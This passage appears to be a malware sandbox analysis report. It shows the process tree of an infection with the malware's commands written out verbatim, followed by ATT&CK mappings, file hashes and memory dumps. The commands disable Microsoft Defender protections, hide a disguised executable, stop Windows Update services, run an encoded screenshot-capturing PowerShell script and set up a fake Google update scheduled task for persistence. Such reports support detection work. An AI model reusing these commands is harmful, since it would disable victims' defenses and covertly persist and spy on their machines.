    PID:1524
- - C:\Windows\System32\Wbem\wmic.exe
    wmic os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3140
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\loader.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5096
- - C:\Windows\system32\attrib.exe
    attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\WindowsSecurity.exe
    3⤵
    - Views/modifies file attributes
    PID:2748
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1384
- - C:\Windows\System32\Wbem\wmic.exe
    wmic cpu get Name
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4080
- - C:\Windows\System32\Wbem\wmic.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4760
- - C:\Windows\system32\attrib.exe
    attrib -r C:\Windows\System32\drivers\etc\hosts
    3⤵
    - Drops file in Drivers directory
    - Views/modifies file attributes
    PID:2124
- - C:\Windows\system32\attrib.exe
    attrib +r C:\Windows\System32\drivers\etc\hosts
    3⤵
    - Drops file in Drivers directory
    - Views/modifies file attributes
    PID:692
- - C:\Windows\System32\Wbem\wmic.exe
    wmic csproduct get UUID
    3⤵
    PID:3568
- - C:\Windows\system32\netsh.exe
    netsh wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:524
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3632
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s00m31us\s00m31us.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1628
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8D2C.tmp" "c:\Users\Admin\AppData\Local\Temp\s00m31us\CSC8A8525BEEBFF40D4A4DE7AA04DA7FBA0.TMP"
        5⤵
        
        PID:3128
- - C:\Users\Admin\AppData\Local\Temp\.exe
    C:\Users\Admin\AppData\Local\Temp\.exe
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:216
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4852
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1448
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2296
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2932
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:632
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2364
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2496
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1976
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfgfynpn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:64
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:4196
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:1204
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3360
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:4100
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:828
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4224
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:524
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3448
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4808
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1096
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:4508
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfgfynpn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:1644
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3640
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:2976
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:1508

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3524

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3712

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3896

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4108

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1936

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4936

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1808

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4640

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:3332

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1424

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:2012

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4272

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4840

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:2764

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:2628

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:4092

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:4792

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Filesize
328B

MD5
8c398329ce434881ceff9c0cbc469141

SHA1
4a803fe6aa0570f6f8a8d92491085ac95bb723df

SHA256
dfdee7b54ac640492d18912c0580383c906fc5a4d9597c19c93e342d38e63e0c

SHA512
901ae56e99583e40d47f0384b204e8f502b592b13227750cac1c1dc7eddb41fd39d367dd97bf1642f774e76a5ba56d2f77bb36aeab86cd2a318fffca122a7837

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9c740b7699e2363ac4ecdf496520ca35

SHA1
aa8691a8c56500d82c5fc8c35209bc6fe50ab1d9

SHA256
be96c91b62ba9ba7072ab89e66543328c9e4395150f9dbe8067332d94a3ecc61

SHA512
8885683f96353582eb871209e766e7eba1a72a2837ce27ea298b7b5b169621d1fa3fce25346b6bfd258b52642644234da9559d4e765a2023a5a5fc1f544cc7af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a9876c009041c7f35ee8189593f94c20

SHA1
47ef265b6690f18408e9de8ed8923605b1b88955

SHA256
bd1fb213581e372351fcca70d1f3275a8bb5a5b4195a3d11548a1c86c0d53da9

SHA512
cb5b1b139209b853aa4eb6ae18be68b8a0b3fc02e3db7bdb6eb9ece5670d5908b7162116736c51f4e745b75aae8b78ceef81a2c5f44466c89c4999d26f05150b

Download Submit
C:\Users\Admin\AppData\Local\Temp\082pzFv9fN\Display (1).png

Filesize
432KB

MD5
b7330f8f0bbba1a89a7e86aa37f4a31f

SHA1
0c02f7a9d1b27a0fc5ac65edc8cd063ce0ac7d51

SHA256
63c51ac8c5f6d74f9616438d67feb65feddc591c03c435cf2423d1b0b7ff881b

SHA512
611d5c4b0096e0ffeabb632df6e98a5e3d5baf8fd40a2956359a9b8c3943e44abd074d29a462fcb610b3d7655fc8310530f938c43da9d4bee0e35bedfa56a3f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8D2C.tmp

Filesize
1KB

MD5
9c1e8e2fe00c2034383a268e537ab7ce

SHA1
b0530ecf357d3116f2741840416d8f6a4c19ed06

SHA256
aa5fae420925bde2a7ef7b6d06492378f8e9e7d47a50e067888b3c6f701e25c3

SHA512
e51cb58502398f2b32d343f2416af9a861e0957d7a1740b2e4146e8d96be91e944f79bcdb6b157d42bd2ea353d3cb6504dde6fd106740bf6fb134372e5c813a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hbwzny4b.nzx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\s00m31us\s00m31us.dll

Filesize
4KB

MD5
8a48de96181b1cf9a6835534c5c60d06

SHA1
ae4f3e45e4e8cdca7c2a8848b7f85fe0b15370ca

SHA256
885f3ab978f054e7498ea83888b38b31196f2432a8001ba856a674b869309b90

SHA512
45c9d9327c3b81689ae847c5bf8f71803283e8f10c97711ff1cab74c698fa590e298d6800e2da552bd3e061a7cb9b4af44273e54712e143a878e50dc75fa54ed

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\WindowsSecurity.exe

Filesize
14.4MB

MD5
0b36da64b85e5abae7a93017d46dcce1

SHA1
40506f88be2a8f9fc03083f8d934b58fe22c3ae5

SHA256
0ca594179661c1ec0c7ec592be1995a14e2b0d13d0bd7a3420cb49e6254d2903

SHA512
a0a8fbb2127451ae7c776fff5e2d26d1d8e035527010f7f91a2904a76edfcaa054bf5becddc29fbe98e49bd211f8ae1f94c884e8e92c9b62984313cf843d9572

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b42c70c1dbf0d1d477ec86902db9e986

SHA1
1d1c0a670748b3d10bee8272e5d67a4fabefd31f

SHA256
8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

SHA512
57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\s00m31us\CSC8A8525BEEBFF40D4A4DE7AA04DA7FBA0.TMP

Filesize
652B

MD5
ec28a8c0b0df83699a7f418ecd1bdba7

SHA1
3c136c17a847df5bc730185b13a756dae949ce27

SHA256
747e61c8981b0447efd0ccc5044643a51f44a7775f4649f181fe9a4c2dd31a26

SHA512
9fd3d9a18cf99df78074c2bbef5832aa7f001e6f8140864ac65ba0806414c9dab752ee2adee7cfdd35c831f237d064730b8e7bb152134f0814f6ebf24eca959b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\s00m31us\s00m31us.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\s00m31us\s00m31us.cmdline

Filesize
607B

MD5
30dd83a3a7bee2392df67a039dafd458

SHA1
8ae9a2797ba059a832e927394353b64f0a120e5f

SHA256
2c85387a86c30d110c06d1e3cf592e526cdc47b185f827750d502cd0701fc18e

SHA512
baa67f44371b35fe4bb839d92ee50099f29b3b473035e099a83e92d34c98d94ee6790b1ed3acfbd39b5661ca6ed872c4e383b87d9737c6a14e2175bff07207a8

Download Submit
memory/216-97-0x00007FF68D450000-0x00007FF690D05000-memory.dmp

Filesize
56.7MB

Download
memory/216-69-0x00007FF68D450000-0x00007FF690D05000-memory.dmp

Filesize
56.7MB

Download
memory/384-108-0x0000029136700000-0x0000029136727000-memory.dmp

Filesize
156KB

Download
memory/384-109-0x00007FF9F2FF0000-0x00007FF9F3000000-memory.dmp

Filesize
64KB

Download
memory/588-98-0x000001CA17F40000-0x000001CA17F61000-memory.dmp

Filesize
132KB

Download
memory/588-100-0x000001CA17F70000-0x000001CA17F97000-memory.dmp

Filesize
156KB

Download
memory/588-101-0x00007FF9F2FF0000-0x00007FF9F3000000-memory.dmp

Filesize
64KB

Download
memory/676-103-0x000002275AEA0000-0x000002275AEC7000-memory.dmp

Filesize
156KB

Download
memory/676-104-0x00007FF9F2FF0000-0x00007FF9F3000000-memory.dmp

Filesize
64KB

Download
memory/868-116-0x00007FF9F2FF0000-0x00007FF9F3000000-memory.dmp

Filesize
64KB

Download
memory/868-115-0x000002B5060E0000-0x000002B506107000-memory.dmp

Filesize
156KB

Download
memory/952-126-0x00007FF9F2FF0000-0x00007FF9F3000000-memory.dmp

Filesize
64KB

Download
memory/952-125-0x00000200F9290000-0x00000200F92B7000-memory.dmp

Filesize
156KB

Download
memory/956-112-0x00000219345D0000-0x00000219345F7000-memory.dmp

Filesize
156KB

Download
memory/956-113-0x00007FF9F2FF0000-0x00007FF9F3000000-memory.dmp

Filesize
64KB

Download
memory/1060-129-0x00007FF9F2FF0000-0x00007FF9F3000000-memory.dmp

Filesize
64KB

Download
memory/1060-128-0x000001E7673C0000-0x000001E7673E7000-memory.dmp

Filesize
156KB

Download
memory/1068-132-0x00007FF9F2FF0000-0x00007FF9F3000000-memory.dmp

Filesize
64KB

Download
memory/1068-131-0x00000278C98A0000-0x00000278C98C7000-memory.dmp

Filesize
156KB

Download
memory/1084-135-0x00007FF9F2FF0000-0x00007FF9F3000000-memory.dmp

Filesize
64KB

Download
memory/1084-134-0x0000022FAACA0000-0x0000022FAACC7000-memory.dmp

Filesize
156KB

Download
memory/1176-137-0x000001F84C560000-0x000001F84C587000-memory.dmp

Filesize
156KB

Download
memory/1176-138-0x00007FF9F2FF0000-0x00007FF9F3000000-memory.dmp

Filesize
64KB

Download
memory/1204-376-0x00000255B1E50000-0x00000255B1E5A000-memory.dmp

Filesize
40KB

Download
memory/1204-368-0x00000255B1BE0000-0x00000255B1BFC000-memory.dmp

Filesize
112KB

Download
memory/1204-369-0x00000255B1C00000-0x00000255B1CB5000-memory.dmp

Filesize
724KB

Download
memory/1204-375-0x00000255B1E40000-0x00000255B1E46000-memory.dmp

Filesize
24KB

Download
memory/1204-373-0x00000255B1E60000-0x00000255B1E7A000-memory.dmp

Filesize
104KB

Download
memory/1204-372-0x00000255B1E00000-0x00000255B1E0A000-memory.dmp

Filesize
40KB

Download
memory/1204-371-0x00000255B1E20000-0x00000255B1E3C000-memory.dmp

Filesize
